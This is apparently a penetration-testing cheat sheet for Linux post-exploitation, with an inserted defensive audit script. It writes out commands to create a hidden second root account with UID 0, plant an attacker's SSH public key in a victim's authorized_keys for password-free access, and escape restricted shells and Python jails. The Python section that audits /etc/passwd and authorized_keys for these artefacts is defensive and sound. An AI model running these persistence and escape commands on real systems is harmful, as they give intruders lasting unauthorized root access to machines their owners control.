In this section, you will find several useful commands for the Post-Exploitation phase in Linux systems.


Creating a user

sudo useradd [-m] <USERNAME>

Add a user to a group

sudo usermod -aG <GROUP> <USERNAME>

Create an alternative root user

useradd -m -ou 0 -g 0 -p <ENCRYPTED_PASSWORD> -s /bin/bash <USERNAME>

Login through SSH

There are times when we have a remote terminal as a user but also want SSH access as that user without knowing their password. SSH keys cover this case: the attacker's public key is appended to the user's authorized_keys file, after which key-based login works regardless of the password.
1. Generate an SSH key pair.
kali@kali:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/
2. Add the public key to the victim's ~/.ssh/authorized_keys file:
echo -e "\n<PUB_KEY>\n" >> ~/.ssh/authorized_keys
3. Log in.
ssh -i ~/.ssh/id_rsa <USERNAME>@<IP>
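Both of the persistence steps above (a second UID 0 account created with useradd -o -u 0, and a public key appended to authorized_keys) leave artefacts that a defender can audit. The following is an added example, not code from the original page, using constructed sample data; in practice you would feed it the real /etc/passwd and each user's ~/.ssh/authorized_keys and diff against a recorded baseline.

```python
"""Audit helpers for two persistence artefacts the cheatsheet describes:
a second UID-0 account (useradd -o -u 0) and an appended authorized_keys
entry. Added example with constructed sample data, not code from the page."""
from typing import List, Tuple

# Constructed /etc/passwd excerpt: 'backup2' was made with `useradd -o -u 0 -g 0`.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
kali:x:1000:1000:kali:/home/kali:/bin/bash
backup2:x:0:0::/home/backup2:/bin/bash
"""

# Constructed authorized_keys; the blank lines are what `echo -e "\n<PUB_KEY>\n"` leaves behind.
SAMPLE_AUTH_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyMaterialNotReal0000000000 admin@workstation

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQExampleKeyMaterialNotReal000000000000 kali@kali

"""
KEY_PREFIXES = ("ssh-", "ecdsa-", "sk-")

def extra_uid0_accounts(passwd_text: str) -> List[str]:
    """Names of accounts other than root that carry UID 0 (none is expected)."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line; a real audit would flag it too
        if fields[2].isdigit() and int(fields[2]) == 0 and fields[0] != "root":
            hits.append(fields[0])
    return hits

def authorized_keys_entries(keys_text: str) -> List[Tuple[str, str]]:
    """(key type, comment) per key line; options before the key type are skipped."""
    entries = []
    for line in keys_text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        idx = next((i for i, p in enumerate(parts) if p.startswith(KEY_PREFIXES)), None)
        if idx is None or len(parts) < idx + 2:
            continue  # no recognisable key on this line
        entries.append((parts[idx], " ".join(parts[idx + 2:])))
    return entries

def new_key_entries(current, baseline):
    """Entries in current that were not in the recorded baseline."""
    return [e for e in current if e not in baseline]
```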

Shell Escapes

It could be the case that you have obtained access to a restricted shell that allows only a small set of commands and prevents you from accessing other directories or files.
In this section, you will find some ways to escape those restricted shells.


ssh <USERNAME>@<TARGET_IP> -t "bash --noprofile -i"

Python Jail

import os; os.system('/bin/bash')
For more examples of how to escape restricted shells, read the following articles.